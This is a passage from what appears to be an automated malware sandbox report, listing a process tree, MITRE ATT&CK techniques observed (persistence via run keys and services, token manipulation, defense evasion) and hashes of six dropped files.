  PID: 5008

  C:\Windows\System32\MsiExec.exe
    Command line: C:\Windows\System32\MsiExec.exe -Embedding 4DA5CAD9BB5886349D3C0D68A47888A4 C
    - Loads dropped DLL
    - Drops file in System32 directory
    PID: 1884

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 800 -ip 800
  PID: 1044
Network
MITRE ATT&CK Enterprise v15

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  System Services (1)
    Service Execution (1)

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)

Privilege Escalation
  Access Token Manipulation (1)
    Create Process with Token (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)

Defense Evasion
  Access Token Manipulation (1)
    Create Process with Token (1)
  Impair Defenses (1)
  Modify Registry (1)
  System Binary Proxy Execution (1)
    Regsvcs/Regasm (1)
Downloads

File 1
  Filesize: 88KB
  MD5: 17fc12902f4769af3a9271eb4e2dacce
  SHA1: 9a4a1581cc3971579574f837e110f3bd6d529dab
  SHA256: 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
  SHA512: 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

File 2
  Filesize: 3.4MB
  MD5: 4bef1140a7cadc194f2c20bff8f3b71d
  SHA1: fa0e79b3dd1bad013c47ac8e0ded03216d044635
  SHA256: a40a496fcfb6ab3935098e2158681e095dc83a66f3984aa01e1f0997208749da
  SHA512: c2551a9b758d74d203c49c9bc185bd1dfc022d090718004536757fede4c6e4b8a014f385acc713ab94c83c45b1fbf0c6d5a6f559d4c0c29114344f1200ea0c32

File 3
  Filesize: 63KB
  MD5: 0d5df43af2916f47d00c1573797c1a13
  SHA1: 230ab5559e806574d26b4c20847c368ed55483b0
  SHA256: c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
  SHA512: f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

File 4
  Filesize: 201B
  MD5: 037e1750f892c1bc7d7e45d0e7735d57
  SHA1: 32d9b435ac76f32271fed9d602e723a64621bf36
  SHA256: a1c60aeef9648ffc3619215635803794319570461d1c51994ad39610aeb6ad59
  SHA512: 59734b5e8f8ffe76288820ef5a538a3243a23fc085418d69015704372282b59d87c2a8c5a927d87db5bd53e6985f66db6c13d93409da7ea28fb96e7c178d8c82

File 5
  Filesize: 203B
  MD5: 7934bcc2aeba3653f7dd1e17aa8718d4
  SHA1: caee6d564f75e258962a7be57f6afbb581c2d258
  SHA256: 6c0927052dc12173fd24ffcbb9bac846e3713f606e3c968603d4d36a2d76e548
  SHA512: 7ecb97a6ad07f33392f098e4aaf733211d5ab7b367b134fad8d4dc7c7c5942237d104158dc82204ad909b6ffc31db925fffff55b0d542e106d926a38fe9fc5db

File 6
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82